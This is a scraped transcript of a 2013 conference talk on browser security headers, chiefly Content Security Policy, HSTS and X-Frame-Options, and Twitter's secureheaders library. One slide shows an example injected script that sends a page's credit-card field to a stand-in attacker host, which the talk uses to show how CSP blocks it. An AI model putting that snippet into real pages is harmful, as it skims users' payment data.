Owasp austin

1,247 views

Published on

  • Be the first to comment

Owasp austin

  1. 1. @ LASCONATXApril 30, 2013CSP To theRescue
  2. 2. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityIt’s all about meI’ve been called a jackassI’ve been called an “appsechole”I have opinionsOpinions are often wrongPlease disagree with meThat’s how we learn
  3. 3. CSPBrakemanThreatDeckPhantom GangRoshamboEmaildevelopersEmailsecurity
  4. 4. Code reviewExternal reportsPen testingStatic analysis toolsDynamic analysis toolsCSP
  5. 5. Get the right information to theright people
  6. 6. Find bugs as quickly as possible
  7. 7. Analyze from many angles
  8. 8. Help people help themselves
  9. 9. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityDo you use these?Content security policyX-Frame-OptionsHTTP Strict Transport SecurityX-Xss-ProtectionX-Content-Type-Options
  10. 10. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityI’m already boredTime to get awesomer
  11. 11. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecuritySecurity headersLeverage the browser for security
  12. 12. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecuritySweeeeet. I don’t have write secure code!
  13. 13. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityTime of convergence
  14. 14. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityShould you?
  15. 15. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityX-ContentType-OptionsFixes mime sniffing attacksOnly applies to IE, because only IE would do somethinglike thisX-Content-Type-Options = ‘nosniff’zzzzZZZZZZzzzzz
  16. 16. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityX-Xss-ProtectionUse the browser’s built in XSS AuditorX-Xss-Protection: [0-1](; mode=block)?X-Xss-Protection: 1; mode=blockzzzzZZZ... huh? zzzzzzzz
  17. 17. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityX-Frame-OptionsProtects you from most classes ofClickjackingX-Frame-Options: DENYX-Frame-Options: SAMEORIGINX-Frame-Options: ALLOW FROM example.comzzz... oh hey thats cool. Don’t frame my stuff.
  18. 18. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityX-Frame-Options
  19. 19. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityFiresheep/SSL StripGiven I don’t have an HSTS headerAnd I have a sessionWhen I visit http://example.comThen I am pwned
  20. 20. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityOther ssl failsPosting passwords over HTTPLoading mixed contentUsing protocol relative URLS
  21. 21. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityStrict Transport Security
  22. 22. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityHow hard is it to use?Base CaseStrict-transport-security: max-age=10000000Do all of your subdomains support SSL?Strict-transport-security: max-age=10000000; includeSubdomains
  23. 23. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityContent secur-a-wat?Content security policy is reshaping the security modelIt is a complicated spec with great differences across browsersIt is not widely adoptedHowever!It completely eliminates reflected and stored XSSIt ensures that you never load mixed contentIt allows you to accept arbitrary html code from users
  24. 24. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityWat? Sounds cool.script-srcstyle-srcimg-srcdefault-srcframe-srcconnect-srcfont-srcmedia-srcobject-srcreport-uri
  25. 25. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityQuickTime™ and aH.264 decompressorare needed to see this picture.
  26. 26. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityGet rid of XSS, eh?A script-src directive that doesn’t contain ‘unsafe-inline’ almosteliminates most forms of cross site scripting.I WILL NOT WRITE INLINE JAVASCRIPTI WILL NOT WRITE INLINE JAVASCRIPTI WILL NOT WRITE INLINE JAVASCRIPTI WILL NOT WRITE INLINE JAVASCRIPTI WILL NOT WRITE INLINE JAVASCRIPTI WILL NOT WRITE INLINE JAVASCRIPTI WILL NOT WRITE INLINE JAVASCRIPT
  27. 27. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurity
  28. 28. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityBut I have to...OK, then I’ll inject:<script>var image = new Image();image.src = “cyberhacker.com/steal?data=”+ $(‘#credit_card’).val();</script>FALSE! img-src violation, no XHR allowed
  29. 29. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityInline css too? WTF?
  30. 30. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityHow to apply?Secure headers! (poor name, I know)Open sourced earlier this yearhttps://github.com/twitter/secureheaders
  31. 31. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityHow does it work?It sets a before_filter that applies each headerValues are based on options passed to filter, or in an initializerEasily overriddenSecure by default!!!
  32. 32. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityWhat about that security policy thingyThere are > 6 differences between these two header values
  33. 33. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityYay for standardshttps://t.co/f26WWx3r7y
  34. 34. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurity
  35. 35. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityLong hair don’t careAbout browser inconsistencies
  36. 36. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityW3Get involved!!!Key results from F2F in San Jose
  37. 37. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityLine numbers and column numbersPreviously, a report that was caused by inline scripts/styles was crypticOriginal FF implementation contained a script-sampleEvals/inserting script into DOM would be buried in minified JS
  38. 38. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurity“sudo for javascript”Bookmarklets/plugins/etcHow should they behave?Bookmarklets show clear intentionPlugins somewhat questionableNeed to live outside the control of the parent pageBut how?
  39. 39. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityReporting cross-originOriginal implementation did not allow CSP reports to be sent to a URIthat does not match the same origin policy, using the eTLDe.g. https://ads.twitter.com can send reports to https://twitter.com,but not http://twitter.com or https://support.twitter.com or https://twitter.com:3000As a result of the w3 face to face, the 1.0 spec shall say that reports canbe sent anywhere!However, cross-origin requests not allowed by CORS will be “unauthenticated”
  40. 40. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityscript-(nonce|hash)The clash of the titans
  41. 41. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityFuture
  42. 42. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityYou mean there’s more on CSP?The browser sends reports!
  43. 43. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityWhat does the report look like?{"csp-report"=> {"document-uri"=>"http://localhost:3000/home","referrer"=>"","blocked-uri"=>"ws://localhost:35729/livereload","violated-directive"=>"xhr-src ws://localhost.twitter.com:*"}}
  44. 44. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityQuiz: what does this report indicate?{"csp-report"=> {"document-uri"=>"http://example.com/welcome","referrer"=>"","blocked-uri"=>"self","violated-directive"=>"inline script base restriction","source-file"=>"http://example.com/welcome","script-sample"=>"alert(1)","line-number"=>81,"column-number"=>1463,}}
  45. 45. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityMonitor and Tune ALL the things
  46. 46. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecuritySplunk
  47. 47. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityTrending and anomalies
  48. 48. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurity
  49. 49. @LASCONATX April 2013@ndm | @SeeEssPee | @sadb | @twittersecurityHeader status page
  50. 50. CSPBrakemanThreatDeckPhantom GangRoshamboEmaildevelopersEmailsecurity

×